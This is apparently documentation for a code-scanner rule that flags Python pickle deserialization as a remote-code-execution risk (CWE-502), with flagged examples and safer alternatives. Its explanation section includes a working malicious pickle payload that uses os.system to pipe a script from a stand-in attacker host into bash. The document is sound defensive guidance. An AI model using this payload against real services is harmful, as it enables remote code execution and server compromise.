VNX-PY-003 – Insecure Deserialization with pickle

Overview

This rule flags calls to pickle.load(), pickle.loads(), cPickle.load(), and cPickle.loads(). The Python pickle format is a bytecode stream for a stack-based virtual machine. When Python deserializes a pickle stream it executes the bytecode, which means a malicious pickle payload can run arbitrary Python code — including importing modules, calling functions, and executing system commands — before your application logic ever sees the data. There is no option to safely load an untrusted pickle. This maps to CWE-502: Deserialization of Untrusted Data.

Severity: High | CWE: CWE-502 – Deserialization of Untrusted Data

Why This Matters

Pickle-based remote code execution is trivial to exploit. An attacker only needs to craft a Python object that implements __reduce__ returning a callable and arguments. When Python deserializes this object it calls the callable automatically:

# What a malicious pickle payload looks like when crafted
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl https://attacker.example/shell | bash",))

payload = pickle.dumps(Exploit())
# Anyone calling pickle.loads(payload) executes the shell command

This payload is only a few bytes and trivially embeds in any data channel that uses pickle: file uploads, API responses, Redis cache entries, message queue messages, or ML model files. Unlike SQL injection or XSS, there is no input validation or escaping that makes pickle safe — the code executes before you can inspect the data.

What Gets Flagged

Any .py file containing pickle.load(, pickle.loads(, cPickle.load(, or cPickle.loads(.

# FLAGGED: loading from a file
with open("data.pkl", "rb") as f:
    obj = pickle.load(f)

# FLAGGED: loading from a network response
obj = pickle.loads(response.content)

# FLAGGED: loading from Redis cache
obj = pickle.loads(redis_client.get("session:" + session_id))

# FLAGGED: cPickle is equally unsafe
import cPickle
obj = cPickle.loads(data)

Remediation

  1. Replace pickle with a safe serialization format. For most use cases, JSON or MessagePack provides everything pickle does without code execution:
import json

# SAFE: serialize to JSON
serialized = json.dumps({"key": "value", "count": 42})

# SAFE: deserialize from JSON — no code execution possible
data = json.loads(serialized)
import msgpack  # pip install msgpack

# SAFE: compact binary format, no code execution
serialized = msgpack.packb({"key": "value"})
data = msgpack.unpackb(serialized, raw=False)
  1. If you must use pickle on data you do not control, implement a SafeUnpickler. This restricts which classes can be instantiated during deserialization. Only classes you explicitly allow can appear in the pickle stream:
import pickle
import io

SAFE_CLASSES = {
    ("builtins", "list"),
    ("builtins", "dict"),
    ("myapp.models", "UserProfile"),
}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in SAFE_CLASSES:
            raise pickle.UnpicklingError(
                f"Forbidden class: {module}.{name}"
            )
        return super().find_class(module, name)

# SAFER (but still prefer JSON): load with class allowlist
obj = SafeUnpickler(io.BytesIO(data)).load()
  1. For ML model files, use a format designed for safety. See VNX-PY-013 for detailed guidance on torch.load(..., weights_only=True) and SafeTensors.

  2. Audit existing pickle usage. Search for all import pickle and import cPickle statements in your codebase to find serialization code that feeds data back into pickle — both the write and read side need to be assessed.

References